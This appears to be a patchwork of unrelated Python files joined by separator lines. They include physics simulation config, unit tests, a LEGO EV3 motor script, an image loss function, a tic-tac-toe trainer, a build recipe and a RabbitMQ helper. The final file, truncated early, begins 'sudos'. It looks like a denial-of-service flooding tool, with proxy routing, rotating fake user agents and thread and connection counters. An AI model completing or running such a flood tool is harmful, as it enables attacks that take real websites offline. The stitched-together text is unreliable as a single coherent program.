"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"entropy_eps": {
"default": 1e-3,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"energy_eps": {
"default": 1e-3,
"idfunc": lambda dataname, pars: dataname == "umps_groundstate"
},
"spectrum_eps": {
"default": np.inf,
"idfunc": lambda dataname, pars: (
dataname == "umps_groundstate" and pars["spectrum_eps"] < np.inf
)
},
# MPO time evolution
"lorentzion_timestep": {
"default": 0.2,
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"lorentzion_spacestep": {
"default": 1,
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"lorentzion_padding": {
"default": 3,
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"lorentzion_eps": {
"default": 1e-5,
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"lorentzion_chis": {
"default": range(1,7),
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"insertion_early": {
"default": "z",
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"t": {
"default": 0,
"idfunc": lambda dataname, pars: dataname == "timeevolved_insertion_mcmps"
},
"timesmear_sigma": {
"default": 0,
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["timesmear_sigma"] != 0
)
},
"timesmear_euclideon_timestep": {
"default": 1e-3,
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["timesmear_sigma"] != 0
)
},
"timesmear_euclideon_spacestep": {
"default": 1,
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["timesmear_sigma"] != 0
)
},
"timesmear_euclideon_padding": {
"default": 3,
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["timesmear_sigma"] != 0
)
},
"timesmear_euclideon_eps": {
"default": 1e-10,
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["timesmear_sigma"] != 0
)
},
"timesmear_euclideon_chis": {
"default": range(1,7),
"idfunc": lambda dataname, pars: (
dataname == "timeevolved_insertion_mcmps"
and pars["timesmear_sigma"] != 0
)
},
}
def generate(dataname, *args, pars=dict(), filelogger=None):
infostr = ("{}"
"\nGenerating {} with MPS version {}."
.format("="*70, dataname, version))
logging.info(infostr)
if filelogger is not None:
# Only print the dictionary into the log file, not in stdout.
dictstr = ""
for k,v in sorted(pars.items()):
dictstr += "\n%s = %s"%(k, v)
filelogger.info(dictstr)
if dataname == "umps_groundstate":
res = generate_umps_groundstate(*args, pars=pars)
elif dataname == "timeevolved_insertion_mcmps":
res = generate_timeevolved_insertion_mcmps(*args, pars=pars)
else:
raise ValueError("Unknown dataname: {}".format(dataname))
return res
def generate_umps_groundstate(*args, pars=dict()):
ham = args[0]
res = umps_mpoevolve.optimize_groundstate(ham, pars)
return res
def generate_timeevolved_insertion_mcmps(*args, pars=dict()):
mcmps = args[0]
if type(mcmps) != McMPS:
umps = mcmps
# It's presumably an UMPS, in need of an operator insertion.
# Create a McMPS out of punching an UMPS with op.
op = mcmps_mpoevolve_real.get_operator_insertion(pars["insertion_early"])
op = umps.tensortype().from_ndarray(op)
tensor = umps.tensor
weights = umps.weights
tensor_op = ncon((tensor, op), ([-1,2,-3], [2,-2]))
mcmps = McMPS(umps, tensors=[tensor_op], weightss=[])
if pars["timesmear_sigma"] > 0:
A = args[2][0]
smear_t = 0
while smear_t < pars["timesmear_sigma"]**2/2:
logging.info("Smearing 'time': {}".format(smear_t))
mcmps = mcmps_mpoevolve_real.mpoevolve(mcmps, A, pars)
smear_t += pars["timesmear_euclideon_timestep"]
smear_t = np.around(smear_t, 10)
mcmps.normalize()
mcmps.normfactor /= np.sqrt(2*np.pi)*pars["timesmear_sigma"]
A = args[1][0]
if np.abs(pars["t"]) < 1e-12:
# We are essentially at time zero, no need to time evolve.
return mcmps
res = mcmps_mpoevolve_real.mpoevolve(mcmps, A, pars)
return res
def prereq_pairs(dataname, pars):
if dataname == "umps_groundstate":
res = prereq_pairs_umps_groundstate(pars)
elif dataname == "timeevolved_insertion_mcmps":
res = prereq_pairs_timeevolved_insertion_mcmps(pars)
else:
raise ValueError("Unknown dataname: {}".format(dataname))
return res
def prereq_pairs_umps_groundstate(pars):
prereq_pars = pars.copy()
res = [("ham", prereq_pars)]
return res
def prereq_pairs_timeevolved_insertion_mcmps(pars):
prereq_pars = pars.copy()
prereq_pars["t"] -= prereq_pars["lorentzion_timestep"]
prereq_pars["t"] = np.around(prereq_pars["t"], 10)
if prereq_pars["t"] < 0:
dataname = "umps_groundstate"
if pars["ground_umps_chis"]:
prereq_pars["mps_chis"] = pars["ground_umps_chis"]
else:
dataname = "timeevolved_insertion_mcmps"
complexion_pars = pars.copy()
complexion_pars["complexion_step_direction"] = 1j
complexion_pars["complexion_timestep"] = pars["lorentzion_timestep"]
complexion_pars["complexion_spacestep"] = pars["lorentzion_spacestep"]
complexion_pars["complexion_chis"] = pars["lorentzion_chis"]
complexion_pars["complexion_padding"] = pars["lorentzion_padding"]
complexion_pars["complexion_eps"] = pars["lorentzion_eps"]
complexion_pars["iter_count"] = 0
complexion_pars["model"] = "complexion_" + pars["model"]
res = ((dataname, prereq_pars), ("A", complexion_pars))
if prereq_pars["t"] < 0 and pars["timesmear_sigma"] > 0:
euclideon_pars = pars.copy()
euclideon_pars["complexion_step_direction"] = -1
euclideon_pars["complexion_timestep"] = pars["timesmear_euclideon_timestep"]
euclideon_pars["complexion_spacestep"] = pars["timesmear_euclideon_spacestep"]
euclideon_pars["complexion_chis"] = pars["timesmear_euclideon_chis"]
euclideon_pars["complexion_padding"] = pars["timesmear_euclideon_padding"]
euclideon_pars["complexion_eps"] = pars["timesmear_euclideon_eps"]
euclideon_pars["iter_count"] = 0
euclideon_pars["model"] = "complexion_sq_" + pars["model"]
res += (("A", euclideon_pars),)
return res
|
import lpaste.lpaste
__name__ == '__main__' and lpaste.lpaste.main()
|
class Solution(object):
def containsDuplicate(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
table = set()
for num in nums:
if num in table:
return True
else:
table.add(num)
return False
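# Illustrative note (not part of the original solution): the set-based scan
# runs in O(n) time with O(n) extra space, e.g.
# Solution().containsDuplicate([1, 2, 3, 1]) returns True.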
|
from aapt2 import aapt
def test_version():
print(aapt.version())
def test_pkg_info():
print(aapt.get_apk_info("$HOME/Downloads/zzt.apk"))
def test_pkg_ls():
print(aapt.ls("$HOME/Downloads/zzt.apk"))
|
import pytest
def test_save_when_pk_exists(user_model):
sam = user_model(id=1, name="Sam", height=178.6, married=True)
# The primary key value is not empty, the force_insert is False,
# this is the update logic, but there is no data in the cache,
# so the save does not take effect.
assert sam.save(force_insert=False) is False
assert user_model.get_or_none(id=1) is None
# Update logic, there is already data in the cache, so save takes effect.
sam = user_model.create(id=1, name="Sam", height=178.6, married=True)
assert user_model.get_or_none(id=1) == sam
sam.height = 180
assert sam.save() is True
assert 180 == user_model.get_by_id(1).height == sam.height
def test_set_by_id(user_model):
with pytest.raises(user_model.DoesNotExist):
user_model.set_by_id(1, {"height": 180})
user_model.create(id=1, name="Sam", height=178.6, married=True)
sam = user_model.set_by_id(1, {"height": 180})
assert 180 == user_model.get_by_id(1).height == sam.height
def test_update(user_model):
sam = user_model.update(id=1, height=180).execute()
assert sam is None
user_model.create(id=1, name="Sam", height=178.6, married=True)
sam = user_model.update(id=1, height=180).execute()
assert 180 == user_model.get_by_id(1).height == sam.height
with pytest.raises(ValueError):
user_model.update(height=180).execute()
def test_update_many(user_model):
sam, amy = user_model.update_many(
{"id": 1, "height": 180}, {"id": 2, "married": True}
).execute()
assert sam == amy is None
user_model.create(id=2, name="Amy", height=167.5, email="Amy@gmail.com")
sam, amy = user_model.update_many(
{"id": 1, "height": 180}, {"id": 2, "married": True}
).execute()
assert sam is None
assert amy.height == 167.5
assert user_model.get_by_id(2).married is True
|
import click
from cloup import option, option_group
global_options = option_group(
"Global options",
option(
"-c",
"--config_file",
help="Specify the configuration file to use for render settings.",
),
option(
"--custom_folders",
is_flag=True,
help="Use the folders defined in the [custom_folders] section of the "
"config file to define the output folder structure.",
),
option(
"--disable_caching",
is_flag=True,
help="Disable the use of the cache (still generates cache files).",
),
option("--flush_cache", is_flag=True, help="Remove cached partial movie files."),
option("--tex_template", help="Specify a custom TeX template file."),
option(
"-v",
"--verbosity",
type=click.Choice(
["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"],
case_sensitive=False,
),
help="Verbosity of CLI output. Changes ffmpeg log level unless 5+.",
),
)
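# Illustrative usage (an assumption, not part of the original module): the
# decorator returned by option_group() is applied to a command callback, so a
# hypothetical `render` command could pick up all of the options above.
import cloup
@cloup.command()
@global_options
def render(**kwargs):
    """Example command that simply echoes the parsed global options."""
    click.echo(kwargs)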
|
#!/usr/bin/env python2
# Copyright (c) 2011 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""The unittest of experiment_file."""
from __future__ import print_function
import StringIO
import unittest
from experiment_file import ExperimentFile
EXPERIMENT_FILE_1 = """
board: x86-alex
remote: chromeos-alex3
perf_args: record -a -e cycles
benchmark: PageCycler {
iterations: 3
}
image1 {
chromeos_image: /usr/local/google/cros_image1.bin
}
image2 {
remote: chromeos-lumpy1
chromeos_image: /usr/local/google/cros_image2.bin
}
"""
EXPERIMENT_FILE_2 = """
board: x86-alex
remote: chromeos-alex3
iterations: 3
benchmark: PageCycler {
}
benchmark: AndroidBench {
iterations: 2
}
image1 {
chromeos_image:/usr/local/google/cros_image1.bin
}
image2 {
chromeos_image: /usr/local/google/cros_image2.bin
}
"""
EXPERIMENT_FILE_3 = """
board: x86-alex
remote: chromeos-alex3
iterations: 3
benchmark: PageCycler {
}
image1 {
chromeos_image:/usr/local/google/cros_image1.bin
}
image1 {
chromeos_image: /usr/local/google/cros_image2.bin
}
"""
OUTPUT_FILE = """board: x86-alex
remote: chromeos-alex3
perf_args: record -a -e cycles
benchmark: PageCycler {
\titerations: 3
}
label: image1 {
\tremote: chromeos-alex3
\tchromeos_image: /usr/local/google/cros_image1.bin
}
label: image2 {
\tremote: chromeos-lumpy1
\tchromeos_image: /usr/local/google/cros_image2.bin
}\n\n"""
class ExperimentFileTest(unittest.TestCase):
"""The main class for Experiment File test."""
def testLoadExperimentFile1(self):
input_file = StringIO.StringIO(EXPERIMENT_FILE_1)
experiment_file = ExperimentFile(input_file)
global_settings = experiment_file.GetGlobalSettings()
self.assertEqual(global_settings.GetField('remote'), ['chromeos-alex3'])
self.assertEqual(
global_settings.GetField('perf_args'), 'record -a -e cycles')
benchmark_settings = experiment_file.GetSettings('benchmark')
self.assertEqual(len(benchmark_settings), 1)
self.assertEqual(benchmark_settings[0].name, 'PageCycler')
self.assertEqual(benchmark_settings[0].GetField('iterations'), 3)
label_settings = experiment_file.GetSettings('label')
self.assertEqual(len(label_settings), 2)
self.assertEqual(label_settings[0].name, 'image1')
self.assertEqual(label_settings[0].GetField('chromeos_image'),
'/usr/local/google/cros_image1.bin')
self.assertEqual(label_settings[1].GetField('remote'), ['chromeos-lumpy1'])
self.assertEqual(label_settings[0].GetField('remote'), ['chromeos-alex3'])
def testOverrideSetting(self):
input_file = StringIO.StringIO(EXPERIMENT_FILE_2)
experiment_file = ExperimentFile(input_file)
global_settings = experiment_file.GetGlobalSettings()
self.assertEqual(global_settings.GetField('remote'), ['chromeos-alex3'])
benchmark_settings = experiment_file.GetSettings('benchmark')
self.assertEqual(len(benchmark_settings), 2)
self.assertEqual(benchmark_settings[0].name, 'PageCycler')
self.assertEqual(benchmark_settings[0].GetField('iterations'), 3)
self.assertEqual(benchmark_settings[1].name, 'AndroidBench')
self.assertEqual(benchmark_settings[1].GetField('iterations'), 2)
def testDuplicateLabel(self):
input_file = StringIO.StringIO(EXPERIMENT_FILE_3)
self.assertRaises(Exception, ExperimentFile, input_file)
def testCanonicalize(self):
input_file = StringIO.StringIO(EXPERIMENT_FILE_1)
experiment_file = ExperimentFile(input_file)
res = experiment_file.Canonicalize()
self.assertEqual(res, OUTPUT_FILE)
if __name__ == '__main__':
unittest.main()
|
import time
import sys
commands = {
'OUTPUT_RESET': 'A2',
'OUTPUT_STOP': 'A3',
'OUTPUT_POWER': 'A4', # seems to max out around 0x1F with 0x20 backwards
'OUTPUT_SPEED': 'A5',
'OUTPUT_START': 'A6',
'OUTPUT_POLARITY': 'A7', # 0x01 forwards, 0x00 toggle, 0xFF backwards
}
motors = {
'A': 1,
'B': 2,
'C': 4,
'D': 8
}
def ev3motor(cmd, m, pwr):
    # Build the motor bitmask (A=1, B=2, C=4, D=8) and print the opcode,
    # layer byte (00) and motor byte as a hex string. The power argument is
    # currently unused.
    motorhx = 0
    for i in list(m):
        motorhx += motors[i]
    motorhx = "%0.2X" % motorhx
    cmdhx = commands[cmd]
    cmdstr = cmdhx + '00' + motorhx
    print(cmdstr)
ev3motor('OUTPUT_START','AB','')
sys.exit()
# command to start motor on port A at speed 20
# 0C 00 00 00 80 00 00 A4 00 01 14 A6 00 01
# 12 0 0 0 128 0 0 164 0 1 20 166 0 1
#
# Length: 0C 00 -> 12
# Counter: 00 00 -> 0
# Reply: 80 -> No reply
# Variables: 00 00 -> None (?)
# Command: A4 -> opOUTPUT_POWER
# 00: Null block
# Motor: 01 -> A
# Value: 14 -> 20
# Command: A6 -> opOUTPUT_START
# 00: Null block
# Motor: 01 -> A
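# Illustrative helper (not part of the original script): assemble a complete
# direct command from an opcode payload, following the layout documented
# above -- 2-byte little-endian length, 2-byte message counter, reply flag
# 0x80, two variable-allocation bytes, then the payload.
def build_direct_command(payload_hex, counter=0):
    payload = bytes.fromhex(payload_hex)
    body = counter.to_bytes(2, 'little') + b'\x80' + b'\x00\x00' + payload
    return len(body).to_bytes(2, 'little') + body
# For example, build_direct_command('A400061FA60006') reproduces start_motor below.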
start_motor_str = '0C000000800000A400061FA60006'
start_motor = bytes.fromhex(start_motor_str)
change_motor_power_str = '09000000800000A70006FF'
change_motor_power = bytes.fromhex(change_motor_power_str)
# command to stop motor on port A
# 09 00 01 00 80 00 00 A3 00 01 00
# 9 0 1 0 128 0 0 163 0 1 0
#
# Length: 09 00 -> 9
# Counter: 01 00 -> 1
# Reply: 80 -> No reply
# Variables: 00 00 -> None (?)
# Command: A3 -> opOUTPUT_STOP
# 00: Null block
# Motor: 01 -> A
# Value: 00 -> Float
stop_motor_str = '09000100800000A3000600'
stop_motor = bytes.fromhex(stop_motor_str)
# send commands to EV3 via bluetooth
with open('/dev/tty.EV3-SerialPort', 'wb', 0) as bt:
bt.write(start_motor)
time.sleep(5)
bt.write(change_motor_power)
time.sleep(5)
bt.write(stop_motor)
|
import torch
import torch.nn.functional as F
from ..registry import LOSSES
@LOSSES.register_module()
class LapLoss(torch.nn.Module):
def __init__(self,
max_levels=5,
channels=1,
device=torch.device('cuda'),
loss_weight=1.0):
super(LapLoss, self).__init__()
self.max_levels = max_levels
self.gauss_kernel = LapLoss._gauss_kernel(
channels=channels, device=device)
self.loss_weight = loss_weight
def forward(self, input, target, weight=None):
pyr_input = LapLoss._laplacian_pyramid(
img=input, kernel=self.gauss_kernel, max_levels=self.max_levels)
pyr_target = LapLoss._laplacian_pyramid(
img=target, kernel=self.gauss_kernel, max_levels=self.max_levels)
loss_lap = sum(F.l1_loss(a, b) for a, b in zip(pyr_input, pyr_target))
return loss_lap * self.loss_weight
@staticmethod
def _gauss_kernel(size=5, device=torch.device('cpu'), channels=3):
kernel = torch.tensor([[1., 4., 6., 4., 1], [4., 16., 24., 16., 4.],
[6., 24., 36., 24., 6.],
[4., 16., 24., 16., 4.], [1., 4., 6., 4., 1.]])
kernel /= 256.
kernel = kernel.repeat(channels, 1, 1, 1)
kernel = kernel.to(device)
return kernel
@staticmethod
def _downsample(x):
return x[:, :, ::2, ::2]
@staticmethod
def _upsample(x):
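        # Zero-interleave the input along height and width (doubling both
        # spatial dimensions), then smooth with 4x the Gaussian kernel --
        # the standard "expand" step of a Laplacian pyramid.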
cc = torch.cat([
x,
torch.zeros(
x.shape[0],
x.shape[1],
x.shape[2],
x.shape[3],
device=x.device)
],
dim=3)
cc = cc.view(x.shape[0], x.shape[1], x.shape[2] * 2, x.shape[3])
cc = cc.permute(0, 1, 3, 2)
cc = torch.cat([
cc,
torch.zeros(
x.shape[0],
x.shape[1],
x.shape[3],
x.shape[2] * 2,
device=x.device)
],
dim=3)
cc = cc.view(x.shape[0], x.shape[1], x.shape[3] * 2, x.shape[2] * 2)
x_up = cc.permute(0, 1, 3, 2)
return LapLoss._conv_gauss(
x_up,
4 * LapLoss._gauss_kernel(channels=x.shape[1], device=x.device))
@staticmethod
def _conv_gauss(img, kernel):
img = F.pad(img, (2, 2, 2, 2), mode='reflect')
out = F.conv2d(img, kernel, groups=img.shape[1])
return out
@staticmethod
def _laplacian_pyramid(img, kernel, max_levels=3):
current = img
pyr = []
for level in range(max_levels):
filtered = LapLoss._conv_gauss(current, kernel)
down = LapLoss._downsample(filtered)
up = LapLoss._upsample(down)
diff = current - up
pyr.append(diff)
current = down
return pyr
@staticmethod
def _weight_pyramid(img, max_levels=3):
current = img
pyr = []
for level in range(max_levels):
down = LapLoss._downsample(current)
pyr.append(current)
current = down
return pyr
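# Illustrative usage (not part of the original module; the relative imports
# above mean this file is intended to be used from within its package):
#
#     loss_fn = LapLoss(max_levels=3, channels=3, device=torch.device('cpu'))
#     pred, target = torch.rand(1, 3, 64, 64), torch.rand(1, 3, 64, 64)
#     loss = loss_fn(pred, target)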
|
"""Module to train tic-tac-toe program."""
import numpy as np
import pickle
import os
from checkwin import checkwin
from decideplay import decideplay
from evalboard import recall_board, diffuse_utility, nd3_to_tuple, tuple_to_nd3
from transform import board_transform, board_itransform
from updateboard import make_move
from updateutility import update_utility, flip_player
#-----------------------------------------------------------------------
# Beginning of Inputs
# Player 1 (i.e. p1) and Player 2 (i.e. p2) numeric representation.
p1 = 1
p2 = 2
# Should training consider previously received rewards or punishments.
use_prob_p1 = False
use_prob_p2 = False
# Number of simulations to perform during training.
number_simulation = 10000
# Name of training file for p1 and p2
file_name_p1 = "training_p1_"+str(number_simulation)
file_name_p2 = "training_p2_"+str(number_simulation)
# Name of file for learning curve (i.e. LC) may be viewed using vis_training.ipynb.
file_name_lc = "LC_"+str(number_simulation)
# Reward for win and punishment for loss.
reward_win = 2
punish_loss = -1
# End of Inputs
#-----------------------------------------------------------------------
# Load previous training sets
boards_played = {}
fnames = {p1: file_name_p1, p2: file_name_p2}
for player in (p1, p2):
if os.path.isfile(fnames[player]):
with open(fnames[player], "rb") as f:
boards_played[player] = pickle.load(f)
else:
boards_played[player] = {}
# Loop through a number of models
training_summary = []
for simulation in range(number_simulation):
# Initialize new game
state = np.zeros((3, 3))
win = False
draw = False
current_game_boards = {p1: [], p2: []}
current_game_move = {p1: [], p2: []}
# Loop through a single game, at most 5 moves for a single player
for game_move in range(5):
# Switch between players
for current_player in (p1, p2):
# Check if board has been seen before
seen_before, key, trans_number = recall_board(state,
boards_played[current_player],
p1=p1,
p2=p2)
# Logic to decide if previous utility will be used
if current_player == p1:
use_prob = True if use_prob_p1 else False
elif current_player == p2:
use_prob = True if use_prob_p2 else False
else:
raise RuntimeError("Player unknown!")
# If seen before and using past info -> recall
# If seen before and not using prob -> set diffuse
# If not seen before -> diffuse
if seen_before:
if use_prob:
board_state = boards_played[current_player][key]
else:
board_state = diffuse_utility(tuple_to_nd3(key), p1=p1, p2=p2)
else:
board_state = diffuse_utility(state, p1=p1, p2=p2)
boards_played[current_player].update({key: board_state})
# Transformed gameboard key
current_game_boards[current_player] += [key]
# Decide the move
true_move, tran_move = decideplay(board_state, trans_number)
            # Save the transformed move
current_game_move[current_player] += [tran_move]
# Make the move, and update state
state = make_move(state, true_move, current_player)
            # Check for a winner only from the third round onwards (a win is impossible earlier).
if game_move >= 2:
win = checkwin(state, p1=p1, p2=p2)
if win:
winning_player = current_player
losing_player = p1 if current_player == p2 else p2
break
                elif (game_move == 4) and (current_player == p1):
draw = True
break
if win | draw:
break
if win | draw:
break
# Update utility
if win:
# Update player 1
boards_played = update_utility(boards_played,
current_game_boards,
current_game_move,
p1,
winning_player,
losing_player,
reward_win,
punish_loss,
flag_indirect=True,
)
# Update player 2
boards_played = update_utility(boards_played,
current_game_boards,
current_game_move,
p2,
winning_player,
losing_player,
reward_win,
punish_loss,
flag_indirect=True,
)
# Save training, win p1=1, win p2=2, tie=0
training_summary += [winning_player] if win else [0]
# Save out boards played during training.
for player in (p1, p2):
with open(fnames[player], "wb") as f:
pickle.dump((boards_played[player]), f)
# Save win, loss, tie training information.
with open(file_name_lc, "wb") as f:
pickle.dump(training_summary, f)
|
from . import sly
|
import os
import shutil
from .base import GnuRecipe
class LaceRecipe(GnuRecipe):
def __init__(self, *args, **kwargs):
super(LaceRecipe, self).__init__(*args, **kwargs)
self.sha256 = '45e546e306c73ceed68329189f8f75fe' \
'cee3a1db8abb02b5838674a98983c5fe'
self.name = 'lace'
self.version = '0d882b10129789cacf901606b972e3159b8ae9b0'
self.depends = ['hwloc']
self.url = self.github_commit('trolando')
self.configure_args = [
'cmake',
'-G',
'"Unix Makefiles"',
'-DCMAKE_BUILD_TYPE=Release',
'-DCMAKE_INSTALL_PREFIX=%s' % self.prefix_dir,
'..']
def configure(self):
dir = os.path.join(self.directory, 'build')
os.makedirs(dir)
old = self.directory
self.directory = dir
super(LaceRecipe, self).configure()
def install(self):
super(LaceRecipe, self).install()
text = r'''
Lace
Lace is a C library that implements work-stealing. Work-stealing is a method for load balancing task-based parallel programs.
Lace is developed (2012-2014) by the Formal Methods and Tools group at the University of Twente. It is licensed with the Apache 2.0 license.
Download
You can clone our Git repository: http://fmt.ewi.utwente.nl/tools/scm/lace.git.
Alternatively, you can download a recent snapshot.
Please let us know if you use Lace in your project.
Testing / Benchmarking
To compile and run the test benchmarks, you need CMake and Python. In a terminal/command line, run the following commands:
cmake .
make
python bench.py
The benchmark script automatically detects the number of CPUs on your system and runs the benchmarks fib, uts, matmul and queens.
Usage
To use Lace in your own projects, you need to generate the header file lace.h. Use the following command to generate this file, replacing N by the highest number of parameters in your tasks:
lace.sh N > lace.h
For example, with N=3, lace.h defines macros TASK_1, TASK_2 and TASK_3 for tasks with 1, 2 or 3 parameters.
Include lace.h when defining tasks. Add lace.c to the source files of your program.
You can separate declaration and implementation using TASK_DECL_* and TASK_IMPL_*. For tasks that don't return a value, use VOID_TASK_*.
For example, to parallelize void search(int a, int b):
// search.h
#include <lace.h>
VOID_TASK_DECL_2(search, int, int);
#define search(a, b) CALL(search, (a), (b))
// search.c
#include <search.h>
VOID_TASK_IMPL_2(search, int, a, int, b)
{
// Implementation here...
}
// some_file.c
#include <search.h>
void some_function()
{
// ...
search(a, b); // execute search in parallel
// alternatively use: CALL(search, a, b);
// ...
}
If you run your program on a NUMA system, set preprocessor define USE_NUMA=1 and add numa_tools.c to the source files of your program.
When using Lace, you need to tell it how many workers there are with a call to lace_init. This function takes two parameters: the number of workers and the (static) size of the task queue of each worker. This initializes Lace, but does not start the worker threads. For the size of the task queue you can use some high number, e.g. 1,000,000. The memory is virtually allocated using mmap but not actually allocated by the kernel until it is used, so a large size is no problem in current multi-core systems.
You can then start the worker pthreads using lace_startup. This function takes three parameters: the size of the program stack of the new pthreads, a Lace callback task that is the starting point of the parallel program, and a parameter for that task. If the first parameter is set to 0, then the default behavior is to allocate a program stack of the same size as the calling thread. If the second and third parameter are set, then the calling thread is suspended until the supplied Lace task is completed and the Lace framework is automatically shut down. If the second and third parameter are set to NULL, then Lace returns control to the calling thread, which is initialized as a Lace worker thread. The function lace_exit must be called manually to shutdown Lace afterwards.
For example:
// fib.h
#include <lace.h>
TASK_DECL_1(int, fib, int);
#define fib(n) CALL(fib, (n))
// fib.c
#include <fib.h>
TASK_IMPL_1(int, fib, int, n)
{
if (n<2) return n;
SPAWN(fib, n-1);
SPAWN(fib, n-2);
int fib_minus_2 = SYNC(fib);
// Alternatively, instead of SPAWN/SYNC, use:
// int fib_minus_2 = CALL(fib, n-2);
int fib_minus_1 = SYNC(fib);
return fib_minus_1 + fib_minus_2;
}
// main.c
#include <fib.h>
LACE_CALLBACK(startup)
{
int n = (int)arg;
printf("fib(%d) = %d\n", n, fib(n));
}
int main(int argc, char** argv) {
int n = 40;
// Initialize for 4 workers and some large enough deque size
lace_init(4, 1000000);
// Launch 3 workers plus 1 worker starting in 'startup' and suspend caller...
lace_startup(0, startup, (void*)n);
// Alternative: launch 3 workers, and return to caller...
lace_startup(0, NULL, NULL);
printf("fib(%d) = %d\n", n, fib(n));
lace_exit();
return 0;
}
It is also possible to manually start worker threads and use lace_init_worker to initialize each worker, then use lace_steal_loop to participate in work-stealing until Lace is shutdown. Note that there is a barrier in Lace initialization code that waits until all workers are initialized, and a barrier in the shutdown code that waits until all workers return.
'''
doc_dir = os.path.join(self.prefix_dir, 'share', 'doc', 'lace')
if os.path.exists(doc_dir):
shutil.rmtree(doc_dir)
os.makedirs(doc_dir)
doc_file = os.path.join(doc_dir, 'README')
self.log_dir('install', doc_dir, 'README documentation')
with open(doc_file, 'wt') as f:
f.write(text)
|
# -*- coding: utf-8 -*-
"""
Created on 21 August 2017
@author: dgrossman
"""
import logging
import threading
import time
from functools import partial
import pika
class Rabbit(object):
'''
Base Class for RabbitMQ
'''
def __init__(self):
self.logger = logging.getLogger('rabbit')
def make_rabbit_connection(self, host, port, exchange, queue_name, keys,
total_sleep=float('inf')): # pragma: no cover
'''
Connects to rabbitmq using the given hostname,
exchange, and queue. Retries on failure until success.
Binds routing keys appropriate for module, and returns
the channel and connection.
'''
wait = True
do_rabbit = True
rabbit_channel = None
rabbit_connection = None
while wait and total_sleep > 0:
try:
# Starting rabbit connection
rabbit_connection = pika.BlockingConnection(
pika.ConnectionParameters(host=host, port=port)
)
rabbit_channel = rabbit_connection.channel()
rabbit_channel.exchange_declare(exchange=exchange,
exchange_type='topic')
rabbit_channel.queue_declare(queue=queue_name, exclusive=False)
self.logger.debug(
'connected to {0} rabbitmq...'.format(host))
wait = False
except Exception as e:
self.logger.debug(
'waiting for connection to {0} rabbitmq...'.format(host))
self.logger.debug(str(e))
time.sleep(2)
total_sleep -= 2
wait = True
if wait:
do_rabbit = False
if isinstance(keys, list) and not wait:
for key in keys:
self.logger.debug(
'array adding key:{0} to rabbitmq channel'.format(key))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=key)
if isinstance(keys, str) and not wait:
self.logger.debug(
'string adding key:{0} to rabbitmq channel'.format(keys))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=keys)
return rabbit_channel, rabbit_connection, do_rabbit
def start_channel(self, channel, mycallback, queue, m_queue):
''' handle threading for messagetype '''
self.logger.debug(
'about to start channel {0}'.format(channel))
channel.basic_consume(queue, partial(mycallback, q=m_queue))
mq_recv_thread = threading.Thread(target=channel.start_consuming)
mq_recv_thread.start()
return mq_recv_thread
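# Illustrative usage (an assumption, not part of the original module): host,
# port, exchange, queue and routing key below are placeholders. The callback
# receives pika's usual arguments plus the `q` keyword added via
# functools.partial in start_channel.
if __name__ == '__main__':
    import queue
    def on_message(channel, method, properties, body, q=None):
        q.put(body)
    rabbit = Rabbit()
    m_queue = queue.Queue()
    chan, conn, ok = rabbit.make_rabbit_connection(
        'localhost', 5672, 'example_exchange', 'example_queue',
        ['example.routing.key'], total_sleep=30)
    if ok:
        rabbit.start_channel(chan, on_message, 'example_queue', m_queue)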
|
#!/usr/bin/env python
#version: 2.5 beta
import threading
import argparse
import random
import atexit
import socket
import socks
import time
import ssl
import sys
import os
start_time = 0
active_connections = 0
connection_limit = 0
active_threads = 0
max_threads = 100
delay = 1
ups = 0
total_ups = 0
dps = 0
total_dps = 0
hrs = 0
total_hrs = 0
total_connected = 0
RED = "\u001b[31;1m"
GREEN = "\u001b[32;1m"
YELLOW = "\u001b[33;1m"
BLUE = "\u001b[34;1m"
RESET = "\u001b[0;0m"
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:27.0) Gecko/20100101 Firefox/27.0",
"AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0.1) ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.7.0; U; Edition MacAppStore; en) ",
"Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/534.34 (KHTML,like Gecko) PhantomJS/1.9.0 (development) Safari/534.34",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2)"
]
def sudos(url, **kwargs):
try:
global active_threads
global active_connections
global hrs
global total_hrs
global total_connected
global dps
global total_dps
global ups
global total_ups
active_threads += 1
connected = False
proxy_type = kwargs.get("proxy_type")
proxy_host = kwargs.get("proxy_host")
proxy_port = kwargs.get("proxy_port")
url_dict = url_split(url)
if not url_dict:
print(f"sudos error: invalid url")
return
protocol = url_dict["protocol"]
host = url_dict["domain"]
port = url_dict["port"]
path = url_dict["path"]
